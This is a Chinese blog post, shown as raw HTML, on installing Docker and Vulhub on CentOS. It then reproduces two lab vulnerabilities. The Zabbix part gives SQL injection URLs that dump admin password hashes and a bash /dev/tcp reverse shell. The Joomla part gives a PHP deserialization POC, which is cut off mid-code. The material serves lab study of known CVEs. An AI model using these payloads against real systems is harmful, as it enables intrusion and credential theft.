

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;dark&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/txbb.jpg">
  <link rel="icon" type="image/png" href="/img/txbb.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Na0h_1e3">
  <meta name="keywords" content="Na0h1e3,blog,博客,web,ctf,渗透">
  <title>搭建vulhub(基于centos) - Na0h的神光棒存放地</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"na0hblog.top","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"🐳_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":true,"baidu":null,"google":"G-MLL1PZ9RBK","gtag":260676474,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"zjCV2oT3ti8Lyk0insYTRpLr-gzGzoHsz","app_key":"y4AXlgIqQsV7Enr3IFS3r6Ck","server_url":"https://zjcv2ot3.lc-cn-n1-shared.com"}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.3.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Na0h的神光棒存放地</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/textbg.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="搭建vulhub(基于centos)">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-02-07 14:53" pubdate>
        2021年2月7日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      31
       分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">搭建vulhub(基于centos)</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2021年2月13日 凌晨
                
              </p>
            
            <div class="markdown-body">
              <!-- more -->

<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>之前有所了解vulhub，但因为一些原因没有深入了解。借助这次任务安装、复现一下漏洞~</p>
<p>使用了：华为云的vps（centos系统）、docker（使用docker的基本要求是linux内核在3.10以上，可用<code>uname -e</code>查看）</p>
<h1 id="安装过程"><a href="#安装过程" class="headerlink" title="安装过程"></a>安装过程</h1><p>安装过程参考自<a target="_blank" rel="noopener" href="https://www.cnblogs.com/Lee-404/p/12763280.html">Centos安装docker+vulhub搭建</a></p>
<p>vulhub漏洞环境文档详情：<a target="_blank" rel="noopener" href="https://vulhub.org/#/environments/">Vulhub - Docker-Compose file for vulnerability environment</a></p>
<h2 id="配置yum源"><a href="#配置yum源" class="headerlink" title="配置yum源"></a>配置yum源</h2><h3 id="备份"><a href="#备份" class="headerlink" title="备份"></a>备份</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs shell">　cd /etc/yum.repos.d<br><br>　mkdir repos_bak　　#用来保存备份文件夹<br><br>　mv *.repo repos_bak<br></code></pre></td></tr></table></figure>
<h3 id="添加新源"><a href="#添加新源" class="headerlink" title="添加新源"></a>添加新源</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs shell">　curl -O http://mirrors.aliyun.com/repo/Centos-7.repo		#此处为阿里源<br>　curl -O http://mirrors.aliyun.com/repo/epel-7.repo<br>　curl -O http://mirrors.aliyun.com/repo/epel-testing.repo<br>　<br>　yum clean all &amp;&amp; yum makecache		#重建源缓存　<br></code></pre></td></tr></table></figure>
<h2 id="安装docker"><a href="#安装docker" class="headerlink" title="安装docker"></a>安装docker</h2><h3 id="确保yum的包为最新"><a href="#确保yum的包为最新" class="headerlink" title="确保yum的包为最新"></a>确保yum的包为最新</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">yum update -y<br></code></pre></td></tr></table></figure>
<h3 id="安装基本驱动依赖"><a href="#安装基本驱动依赖" class="headerlink" title="安装基本驱动依赖"></a>安装基本驱动依赖</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">yum install -y yum-untils device-mapper-persistent-data lvm2<br></code></pre></td></tr></table></figure>
<h3 id="使用阿里的docker源"><a href="#使用阿里的docker源" class="headerlink" title="使用阿里的docker源"></a>使用阿里的docker源</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell">yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo　<br><br>yum makecache fast<br></code></pre></td></tr></table></figure>
<h3 id="安装docker-1"><a href="#安装docker-1" class="headerlink" title="安装docker"></a>安装docker</h3><p>安装默认版本：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">yum -y install docker-ce<br></code></pre></td></tr></table></figure>
<p>指定版本安装：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell">yum list docker-ce --showduplicates | sort -r　　#显示docker版本列表<br><br>yum -y install 版本　　#如：yum -y install docker-ce-18.03.1.ce-1.el7.centos<br></code></pre></td></tr></table></figure>
<h3 id="验证docker是否安装成功以及开机自启"><a href="#验证docker是否安装成功以及开机自启" class="headerlink" title="验证docker是否安装成功以及开机自启"></a>验证docker是否安装成功以及开机自启</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell">docker version				#显示docker版本<br><br>systemctl start docker		#启动docker~<br>systemctl enable docker		#设置开机自启<br></code></pre></td></tr></table></figure>
<h3 id="设置国内源（加速镜像使用-）"><a href="#设置国内源（加速镜像使用-）" class="headerlink" title="设置国内源（加速镜像使用~）"></a>设置国内源（加速镜像使用~）</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">vim /etc/docker/daemon.conf  #如果没有就自己创建，然后输入如下内容<br></code></pre></td></tr></table></figure>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs shell">&#123;<br> 　&quot;registry-mirrors&quot;: [<br>           &quot;https://dockerhub.azk8s.cn&quot;,<br>    　     &quot;https://reg-mirror.qiniu.com&quot;,<br>    　　　　&quot;https://registry.docker-cn.com&quot;,<br>    　　　　&quot;http://hub-mirror.c.163.com&quot;,<br>   　　　　 &quot;https://3laho3y3.mirror.aliyuncs.com&quot;,<br>   　　　　 &quot;http://f1361db2.m.daocloud.io&quot;,<br>   　　　　 &quot;https://mirror.ccs.tencentyun.com&quot;<br> 　　　　     ]<br>&#125;        <br></code></pre></td></tr></table></figure>
<p>vim的小知识：</p>
<p>粘贴完后按一下右上角的<code>esc</code>，然后按<code>:</code>输入<code>wq</code>就可以保存并退出啦~，再加个<code>!</code>就是强制保存并退出啦</p>
<h3 id="重启docker："><a href="#重启docker：" class="headerlink" title="重启docker："></a>重启docker：</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell">systemctl daemon-reload<br><br>systemctl restart docker<br></code></pre></td></tr></table></figure>
<h3 id="安装docker-compose："><a href="#安装docker-compose：" class="headerlink" title="安装docker-compose："></a>安装docker-compose：</h3><p>安装前要安装docker噢，在centos安装指令如下，也就是将可执行文件下载到本地即可~~</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell">curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose<br><br>chmod +x /usr/local/bin/docker-compose		#添加执行权限！<br></code></pre></td></tr></table></figure>
<h2 id="安装vulhub"><a href="#安装vulhub" class="headerlink" title="安装vulhub"></a>安装vulhub</h2><blockquote>
<p>官方文档：</p>
<p>Vulhub是一个面向大众的开源漏洞靶场，无需docker知识，简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单，让安全研究者更加专注于漏洞原理本身。</p>
<p>安装<code>docker</code>和<code>docker-compose</code>后即可开始使用vulhub：</p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta">#</span><span class="bash">安装git，为了后续从github拉取vulhub</span><br>yum -y install git <br><br><span class="hljs-meta">#</span><span class="bash"> 进入漏洞管理目录，在此之前可以mkdir一个~</span><br>cd /<br>mkdir mycve<br>cd mycve<br>git clone https://github.com/vulhub/vulhub.git	#拉取vulhub到目录mycve中<br><br><span class="hljs-meta">#</span><span class="bash"> 编译（可选）</span><br>docker-compose build <br><br><span class="hljs-meta">#</span><span class="bash">进入想安装的漏洞环境目录，运行如下命令即可进行搭建</span> <br>docker-compose up -d <br><br><span class="hljs-meta">#</span><span class="bash">查看服务的运行端口，加上vps的ip地址就能访问啦~</span><br>docker ps<br><br><span class="hljs-meta">#</span><span class="bash">测试完毕之后，使用此命令即可结束服务，使环境变为初始状态。</span><br>docker-compose down <br></code></pre></td></tr></table></figure>
<h3 id="关于漏洞环境搭建的一些补充"><a href="#关于漏洞环境搭建的一些补充" class="headerlink" title="关于漏洞环境搭建的一些补充"></a>关于漏洞环境搭建的一些补充</h3><p>vulhub集成了许多漏洞环境，如下</p>
<p><img src="https://i.loli.net/2021/02/13/Yqo4HjfZFnGBEPi.png" srcset="/img/loading.gif" alt="vulhub集成的环境"></p>
<p>进入想要下载的环境~</p>
<p><img src="https://i.loli.net/2021/02/13/4pPbWUGdxfKIs7k.png" srcset="/img/loading.gif"></p>
<p>再进入相应漏洞目录，运行如下命令即可进行搭建 </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">docker-compose up -d <br></code></pre></td></tr></table></figure>
<p>这里我安装了zabbix的CVE-2016-10134(SQL注入漏洞)</p>
<p>然后访问vps的ip:对应端口即可，如下~</p>
<p><img src="https://i.loli.net/2021/02/13/f325W7Ja8FOEejr.png" srcset="/img/loading.gif"></p>
<p>复现完之后记得还原初始环境噢：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">docker-compose down <br></code></pre></td></tr></table></figure>


<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><p>这里先随便复现两个过过瘾吧，后面再另作目录分组记录~</p>
<h2 id="zabbix-latest-php-SQL注入漏洞（CVE-2016-10134）"><a href="#zabbix-latest-php-SQL注入漏洞（CVE-2016-10134）" class="headerlink" title="zabbix latest.php SQL注入漏洞（CVE-2016-10134）"></a>zabbix latest.php SQL注入漏洞（CVE-2016-10134）</h2><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><p>zabbix是一款服务器监控软件，其由server、agent、web等模块组成，其中web模块由PHP编写，用来显示数据库中的结果。</p>
<p>zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞，攻击者无需授权登陆即可登陆zabbix管理系统</p>
<p>Zabbix 的<code>latest.php中的toggle_ids[]</code>或<code>jsrpc.php中的profieldx2参数</code>存在sql注入，通过sql注入获取管理员账户密码，进入后台，进行getshell操作。</p>
<h3 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h3><h4 id="latest-php中的toggle-ids"><a href="#latest-php中的toggle-ids" class="headerlink" title="latest.php中的toggle_ids[]"></a>latest.php中的toggle_ids[]</h4><p>需要靶机系统未关闭默认开启guest账户登陆，zabbix 默认账户Admin密码zabbix（弱口令尝试一波~）</p>
<p>使用username：guest，password为空的游客账户登陆</p>
<p><img src="https://i.loli.net/2021/02/13/f325W7Ja8FOEejr.png" srcset="/img/loading.gif"></p>
<p>登录后，查看Cookie中的<code>zbx_sessionid</code>，复制后16位字符：</p>
<p><img src="https://i.loli.net/2021/02/13/xBVOFagXmtnzeru.png" srcset="/img/loading.gif"></p>
<p>将这16个字符作为sid的，构造payload：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-link">http://your-ip:8080/latest.php?output=ajax&amp;sid=******************&amp;favobj=toggle&amp;toggle_open_state=1&amp;toggle_ids</span>[<span class="hljs-string"></span>]=updatexml(0,concat(0xa,database(),0xa,user()),0)<br></code></pre></td></tr></table></figure>
<p>如下：</p>
<p><img src="https://i.loli.net/2021/02/13/8uvI9oCdWnzlmYO.png" srcset="/img/loading.gif"></p>
<h4 id="jsrpc-php的profieldx2参数"><a href="#jsrpc-php的profieldx2参数" class="headerlink" title="jsrpc.php的profieldx2参数"></a>jsrpc.php的profieldx2参数</h4><p>也可以通过jsrpc.php触发，且无需登陆</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">http</span>://your-ip:<span class="hljs-number">8080</span>/jsrpc.php?type=<span class="hljs-number">0</span>&amp;mode=<span class="hljs-number">1</span>&amp;method=screen.get&amp;profileIdx=web.item.graph&amp;resourcetype=<span class="hljs-number">17</span>&amp;profileIdx<span class="hljs-number">2</span>=updatexml(<span class="hljs-number">0</span>,concat(<span class="hljs-number">0</span>xa,database(),<span class="hljs-number">0</span>xa,user()),<span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure>
<p>如下：</p>
<p><img src="https://i.loli.net/2021/02/13/HaBdrgTc81yhO5S.png" srcset="/img/loading.gif"></p>
<h4 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h4><p>然后就是常规的注入流程啦。拿到管理员账户密码~</p>
<p>payload:</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">http</span>://yourip:<span class="hljs-number">8080</span>/jsrpc.php?type=<span class="hljs-number">0</span>&amp;mode=<span class="hljs-number">1</span>&amp;method=screen.get&amp;profileIdx=web.item.graph&amp;resourcetype=<span class="hljs-number">17</span>&amp;profileIdx<span class="hljs-number">2</span>=updatexml(<span class="hljs-number">0</span>,concat(<span class="hljs-number">0</span>x<span class="hljs-number">7</span>e,substr((select group_concat(surname,<span class="hljs-number">0</span>x<span class="hljs-number">2</span>a,passwd) from users ),<span class="hljs-number">1</span>)),<span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/02/13/YoTeb7l6DZ5qFnj.png" srcset="/img/loading.gif"><br><img src="https://i.loli.net/2021/02/13/pALPrzy957bBg1x.png" srcset="/img/loading.gif"></p>
<p>Administrator</p>
<p>5fce1b3e34b520afeffb37ce08c7cd66</p>
<p><img src="https://i.loli.net/2021/02/13/1mDdf2a5tz7LHEJ.png" srcset="/img/loading.gif"></p>
<p>MD5解密即得密码zabbix</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">管理员账户：（不懂为啥，用户名是<span class="hljs-keyword">Admin</span>，可能是环境问题？）<br><span class="hljs-keyword">Admin</span><br>zabbix<br></code></pre></td></tr></table></figure>


<p>登入后如下图点击~在administration下的scripts添加命令</p>
<p><img src="https://i.loli.net/2021/02/13/lOjT4emRzKL6cqE.png" srcset="/img/loading.gif"></p>
<p>写入反弹shell：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">bash -i &gt;&amp; /dev/tcp/你的ip/你的端口 0&gt;&amp;1<br></code></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/02/13/XpjChdwn92AJL76.png" srcset="/img/loading.gif"></p>
<p>触发脚本，然后NC监听即可~</p>
<p><img src="https://i.loli.net/2021/02/13/Y9XRjwgMPTvnEHl.png" srcset="/img/loading.gif"></p>
<h2 id="Joomla-3-4-5-反序列化漏洞（CVE-2015-8562）"><a href="#Joomla-3-4-5-反序列化漏洞（CVE-2015-8562）" class="headerlink" title="Joomla 3.4.5 反序列化漏洞（CVE-2015-8562）"></a>Joomla 3.4.5 反序列化漏洞（CVE-2015-8562）</h2><h3 id="安装过程-1"><a href="#安装过程-1" class="headerlink" title="安装过程"></a>安装过程</h3><p>老样子，只是在网页配置过程注意填入如下数据</p>
<p><img src="https://i.loli.net/2021/02/13/mLkDCOvWSzawQ8p.png" srcset="/img/loading.gif"></p>
<h3 id="概述-1"><a href="#概述-1" class="headerlink" title="概述"></a>概述</h3><p>本漏洞根源是PHP5.6.13前的版本在读取存储好的session时，如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中，编码是utf8，当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败，最后触发反序列化漏洞。</p>
<h4 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h4><ul>
<li>Joomla 1.5.x, 2.x, and 3.x before 3.4.6</li>
<li>PHP 5.6 &lt; 5.6.13, PHP 5.5 &lt; 5.5.29 and PHP 5.4 &lt; 5.4.45</li>
</ul>
<h4 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h4><p>1.在低版本的php中,反序列化函数unserialize做了欠缺的异常处理。即不能正确解析需要反序列化的字符串时，会查找字符串中的下一个标识符”|”,从此处分割，以标识符前段做段名，再次解析标识符后段的字符串，直到成功或返回空。(此漏洞修复版本为:4.5.45 5.5.29 5.6.13 7.x)</p>
<blockquote>
<p>在php5.6.13以前的版本里，php在获取session字符串以后，就开始查找第一个|，然后用这个|将字符串分割成『键名』和『键值』。<br>用unserialize解析键值，解析结果作为session。</p>
<p>但如果这个unserialize解析失败，就放弃这次解析。找到下一个|，再根据这个|将字符串分割成两部分，执行同样的操作，直到解析成功。</p>
</blockquote>
<p>2.mysql在低版本或未配置utf8mb4时处理4字节utf字符会从4字节处截断，即丢弃截断处后的字符。（在mysql 5.5.3以后 可以通过设置字段为utf8mb4来避免漏洞）</p>
<blockquote>
<p>在我们构造好的反序列化字符串后面，还有它原本的内容，必须要截断。而此处并不像SQL注入，还有注释符可用。</p>
<p>在插入数据库的时候利用<code>𝌆</code>（%F0%9D%8C%86）字符将utf-8的字段截断了。</p>
<p>这里我们用同样的方法，在session进入数据库的时候就截断后面的内容，避免对我们反序列化过程造成影响。</p>
</blockquote>
<p>3.joomla在对useragent处理时会将useragent作为一个session存入数据库，没有过滤引起php反序列漏洞的”|”符号。</p>
<blockquote>
<p>joomla对session的存储格式为：<code>键名 + | + 经serialize()序列化处理的值</code></p>
<p>此处漏洞主要利用joomla存储格式对 | 的处理不当，导致攻击者可以利用 | 伪造，使得 | 前都为name， | 后就作为我们要插入的序列化字符串，即可构成反序列化漏洞。</p>
</blockquote>
<p>这个joomla漏洞的核心内容就是：我们通过<code>𝌆</code>字符， 将原本的session截断了，结果因为长度不对所以第一次解析|失败，才轮到第二次解析传入的 | ，最后成功利用。</p>
<p>所以，构造session出错，是这个漏洞成立的核心。</p>
<p><strong>整个流程：</strong></p>
<p>第一次传包：</p>
<p>客户端User-Agent字符串-》joomla将User-Agent字符串存储为session-》合并到session表中，序列化，将含poc的字符串存入数据库<strong>（mysql截断漏洞）</strong></p>
<p>第二次传包：</p>
<p>客户端发起请求-》从数据库中读入数据库并反序列化session<strong>（php反序列化漏洞）</strong>-》执行poc，闭合函数</p>
<h3 id="复现-1"><a href="#复现-1" class="headerlink" title="复现"></a>复现</h3><p>不带User-Agent头，先访问一次目标主页，记下服务端返回的Cookie：</p>
<p><img src="https://i.loli.net/2021/02/13/YvDAh5ro3GLyMQu.png" srcset="/img/loading.gif"></p>
<p>vulhub文档滴poc：            （在线执行<a target="_blank" rel="noopener" href="https://sandbox.onlinephpfunctions.com/code/17e7080841ccce12f6c6e0bb1de01b9e390510bd">PHP Sandbox, test PHP online, PHP tester (onlinephpfunctions.com)</a>）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">JSimplepieFactory</span> </span>&#123;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">JDatabaseDriverMysql</span> </span>&#123;<br><br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">SimplePie</span> </span>&#123;<br>    <span class="hljs-keyword">var</span> <span class="hljs-variable">$sanitize</span>;<br>    <span class="hljs-keyword">var</span> <span class="hljs-variable">$cache</span>;<br>    <span class="hljs-keyword">var</span> <span class="hljs-variable">$cache_name_function</span>;<br>    <span class="hljs-keyword">var</span> <span class="hljs-variable">$javascript</span>;<br>    <span class="hljs-keyword">var</span> <span class="hljs-variable">$feed_url</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">$this</span>-&gt;feed_url = <span class="hljs-string">&quot;phpinfo();JFactory::getConfig();exit;&quot;</span>;<br>        <span class="hljs-keyword">$this</span>-&gt;javascript = <span class="hljs-number">9999</span>;<br>        <span class="hljs-keyword">$this</span>-&gt;cache_name_function = <span class="hljs-string">&quot;assert&quot;</span>;<br>        <span class="hljs-keyword">$this</span>-&gt;sanitize = <span class="hljs-keyword">new</span> JDatabaseDriverMysql();<br>        <span class="hljs-keyword">$this</span>-&gt;cache = <span class="hljs-literal">true</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">JDatabaseDriverMysqli</span> </span>&#123;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-variable">$a</span>;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-variable">$disconnectHandlers</span>;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-variable">$connection</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">$this</span>-&gt;a = <span class="hljs-keyword">new</span> JSimplepieFactory();<br>        <span class="hljs-variable">$x</span> = <span class="hljs-keyword">new</span> SimplePie();<br>        <span class="hljs-keyword">$this</span>-&gt;connection = <span class="hljs-number">1</span>;<br>        <span class="hljs-keyword">$this</span>-&gt;disconnectHandlers = [<br>            [<span class="hljs-variable">$x</span>, <span class="hljs-string">&quot;init&quot;</span>],<br>        ];<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> JDatabaseDriverMysqli();<br><span class="hljs-variable">$poc</span> = serialize(<span class="hljs-variable">$a</span>); <br><br><span class="hljs-variable">$poc</span> = str_replace(<span class="hljs-string">&quot;\x00*\x00&quot;</span>, <span class="hljs-string">&#x27;\\0\\0\\0&#x27;</span>, <span class="hljs-variable">$poc</span>);<br><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;123&#125;__test|<span 